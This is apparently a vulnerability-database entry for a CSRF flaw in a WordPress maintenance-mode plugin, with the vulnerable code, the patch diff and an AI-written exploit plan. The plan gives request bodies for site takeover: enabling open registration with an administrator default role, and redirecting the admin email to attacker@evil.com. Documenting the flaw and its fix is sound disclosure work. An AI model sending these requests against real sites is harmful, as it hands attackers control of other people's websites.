[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjEAZrjbycZLkXKl1NgdC3ApG07itU7i0RE2nzxGstw4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-34896","under-construction-coming-soon-maintenance-mode-cross-site-request-forgery","Under Construction, Coming Soon & Maintenance Mode \u003C= 2.1.1 - Cross-Site Request Forgery","The Under Construction, Coming Soon & Maintenance Mode plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","under-construction-maintenance-mode",null,"\u003C=2.1.1","2.1.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-07 00:00:00","2026-04-15 19:50:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F72fac756-6e43-4880-8328-c023429759f3?source=api-prod",9,[22,23,24,25,26],"classes\u002Fcustomizer.php","lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php","readme.txt","ucmm-customize.php","under-construction-maintenance-mode.php","researched",false,3,"This research plan outlines the steps to exploit a Cross-Site Request Forgery (CSRF) vulnerability in the \"Under Construction, Coming Soon & Maintenance Mode\" plugin (versions \u003C= 2.1.1).\n\n### 1. Vulnerability Summary\nThe plugin incorporates a WPBrigade SDK (Telemetry\u002FLogger SDK) which includes a debug view file: `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php`. This file contains logic to perform several administrative actions—most notably updating arbitrary WordPress options via `update_option()`. These actions are triggered via `POST` requests but lack any nonce validation or CSRF protection. An attacker can trick a logged-in administrator into submitting a form that changes critical site settings.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint**: `\u002Fwp-admin\u002Fadmin.php?page=under-construction-maintenance-mode-debug` (The SDK debug page).\n*   **Vulnerable File**: `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php`\n*   **Action Type**: `POST`\n*   **Required Authentication**: Administrator (the victim must be logged in).\n*   **Preconditions**: The plugin must be active, which initializes the SDK and makes the debug page available.\n\n### 3. Code Flow\n1.  **Entry Point**: An administrator visits (or is forced via CSRF to submit a request to) the debug page, which is typically registered under the slug `under-construction-maintenance-mode-debug`.\n2.  **Inclusion**: The SDK's menu callback includes `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php`.\n3.  **Processing**: At the start of `wpb-debug.php`, the code checks for `POST` parameters:\n    *   Line 81: `if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value']))`\n4.  **Sink**:\n    *   Line 86: Calls `custom_plugin_set_option($option_name, $option_value);`\n    *   Line 77: `custom_plugin_set_option` executes `update_option($option_name, $option_value);`.\n5.  **Result**: The WordPress `options` table is updated with attacker-supplied values without any nonce verification (no `check_admin_referer` or `wp_verify_nonce` is present in this file).\n\n### 4. Nonce Acquisition Strategy\n**No nonce is required.**\nAnalysis of `lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php` shows that the `POST` handlers for `wpb_clear_api_cache`, `wpb_action`, `background_sync`, and `set_option_name` do not implement any nonce checks. The forms rendered in the HTML (lines 106-153) also do not contain any `_wpnonce` fields.\n\n### 5. Exploitation Strategy\nThe goal is to change the `users_can_register` option to `1` and the `default_role` to `administrator`, allowing the attacker to register a new admin account.\n\n**Step 1: Change Registration Settings**\nSubmit a CSRF request as the logged-in administrator to enable open registration.\n\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `https:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php?page=under-construction-maintenance-mode-debug`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    set_option_name=users_can_register&option_value=1\n    ```\n\n**Step 2: Change Default Role**\nSubmit a second CSRF request to ensure new users are created as administrators.\n\n*   **Method**: `POST`\n*   **URL**: `https:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php?page=under-construction-maintenance-mode-debug`\n*   **Body**:\n    ```\n    set_option_name=default_role&option_value=administrator\n    ```\n\n**Alternative Quick Impact (Site Takeover):**\nAn attacker could directly change the `admin_email` to their own to initiate a password reset.\n*   **Body**: `set_option_name=admin_email&option_value=attacker@evil.com`\n\n### 6. Test Data Setup\n1.  Install and activate the plugin \"Under Construction, Coming Soon & Maintenance Mode\" version 2.1.1.\n2.  Ensure `users_can_register` is currently `0` (default).\n3.  Ensure the active user is an Administrator.\n\n### 7. Expected Results\n*   The `http_request` should return a `200 OK` status.\n*   The response body should contain the string: `\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>` (from `wpb-debug.php` line 87).\n*   The WordPress database will be updated, effectively bypassing intended security controls.\n\n### 8. Verification Steps\nAfter performing the `POST` requests, verify the changes using WP-CLI:\n\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected: 1\n\n# Verify default role is now administrator\nwp option get default_role\n# Expected: administrator\n```\n\n### 9. Alternative Approaches\nIf the `update_option` vector is somehow restricted by environmental security (like a WAF), other CSRF vectors in the same file can be used to demonstrate impact:\n\n1.  **Clear API Cache**:\n    *   **Body**: `wpb_clear_api_cache=true`\n    *   **Effect**: `update_option('wpb_api_cache', null);`\n2.  **Clear Update Transients**:\n    *   **Body**: `wpb_action=clear_updates_data`\n    *   **Effect**: Deletes `update_plugins` and `update_themes` transients.\n3.  **Data Exfiltration (SSRF-lite)**:\n    *   **Body**: `background_sync=true`\n    *   **Effect**: Triggers `wp_remote_post` to `WPBRIGADE_SDK_API_ENDPOINT` with the `$Data` array, which includes `product_info` and logs. An attacker might control the endpoint if they can first CSRF the endpoint option itself.","The Under Construction, Coming Soon & Maintenance Mode plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) via its SDK debug view. This allows unauthenticated attackers to trick a logged-in administrator into performing actions such as clearing caches, syncing data, or most critically, updating arbitrary WordPress options in the database.","\u002F\u002F lib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php lines 76-88\n\n\u002F\u002F Function to set an option value in the database\nfunction custom_plugin_set_option($option_name, $option_value)\n{\n    update_option($option_name, $option_value);\n}\n\n\u002F\u002F Handle form submission to set option value\nif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value'])) {\n    $option_name = $_POST['set_option_name'];\n    $option_value = $_POST['option_value'];\n\n    custom_plugin_set_option($option_name, $option_value);\n\n    echo '\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>';\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funder-construction-maintenance-mode\u002F2.1.1\u002Flib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php\t2025-02-20 05:24:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funder-construction-maintenance-mode\u002F2.1.2\u002Flib\u002Fwpb-sdk\u002Fviews\u002Fwpb-debug.php\t2026-03-17 05:54:18.000000000 +0000\n+\u002F**\n+ * Verify POST request: method, capability, and nonce for a given action.\n+ *\n+ * @param string $action Nonce action (e.g. 'wpb_debug_clear_cache').\n+ * @return bool True if valid POST with valid nonce and capability.\n+ *\u002F\n+function wpb_debug_verify_request( $action ) {\n+\tif ( ! isset( $_SERVER['REQUEST_METHOD'] ) || 'POST' !== $_SERVER['REQUEST_METHOD'] ) {\n+\t\treturn false;\n+\t}\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\treturn false;\n+\t}\n+\tif ( ! isset( $_POST['_wpnonce'] ) ) {\n+\t\treturn false;\n+\t}\n+\treturn (bool) wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ), $action );\n+}\n...\n+\u002F** Option name prefix allowed for Set DB Option (strict whitelist by prefix). *\u002F\n+define( 'WPB_DEBUG_OPTION_PREFIX', 'wpb_' );\n+\n+\u002F**\n+ * Set an option value only if it is in the allowed prefix scope.\n+ *\n+ * @param string $option_name  Option name (must start with WPB_DEBUG_OPTION_PREFIX).\n+ * @param mixed  $option_value Option value.\n+ * @return bool True on success, false if not allowed.\n+ *\u002F\n+function wpb_debug_set_option( $option_name, $option_value ) {\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\treturn false;\n+\t}\n+\t$option_name = sanitize_text_field( $option_name );\n+\tif ( '' === $option_name || 0 !== strpos( $option_name, WPB_DEBUG_OPTION_PREFIX ) ) {\n+\t\treturn false;\n+\t}\n+\tupdate_option( $option_name, $option_value );\n+\treturn true;\n+}\n \n-\u002F\u002F Handle form submission to set option value\n-if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['set_option_name']) && isset($_POST['option_value'])) {\n-    $option_name = $_POST['set_option_name'];\n-    $option_value = $_POST['option_value'];\n-\n-    custom_plugin_set_option($option_name, $option_value);\n-\n-    echo '\u003Cdiv id=\"success_message\">Successfully set the option\u003C\u002Fdiv>';\n-}\n+$wpb_debug_set_option_success   = false;\n+$wpb_debug_set_option_submitted = false;\n+if ( isset( $_POST['set_option_name'], $_POST['option_value'] ) && wpb_debug_verify_request( 'wpb_debug_set_option' ) ) {\n+\t$wpb_debug_set_option_submitted = true;\n+\t$option_name                    = sanitize_text_field( wp_unslash( $_POST['set_option_name'] ) );\n+\t$option_value                   = isset( $_POST['option_value'] ) ? sanitize_text_field( wp_unslash( $_POST['option_value'] ) ) : '';\n+\t$wpb_debug_set_option_success   = wpb_debug_set_option( $option_name, $option_value );\n+}","The exploit targets the unprotected SDK debug view which is accessible to administrators. Since the page lacks CSRF nonces, an attacker can craft a malicious HTML page that automatically submits POST requests to the debug endpoint when visited by an authenticated admin.\n\n1. Target Endpoint: `\u002Fwp-admin\u002Fadmin.php?page=under-construction-maintenance-mode-debug`.\n2. Methodology: Use a CSRF payload to trigger the `update_option` sink. The attacker sends two consecutive POST requests: \n   - Request 1: Set `set_option_name=users_can_register` and `option_value=1` to allow open registration on the site.\n   - Request 2: Set `set_option_name=default_role` and `option_value=administrator` to ensure new registrants have full site access.\n3. Authentication: Requires an active session for a user with `manage_options` capabilities (typically an administrator).","gemini-3-flash-preview","2026-04-17 21:17:16","2026-04-17 21:17:54",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funder-construction-maintenance-mode\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funder-construction-maintenance-mode.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funder-construction-maintenance-mode\u002Ftags\u002F2.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funder-construction-maintenance-mode.2.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funder-construction-maintenance-mode\u002Ftags"]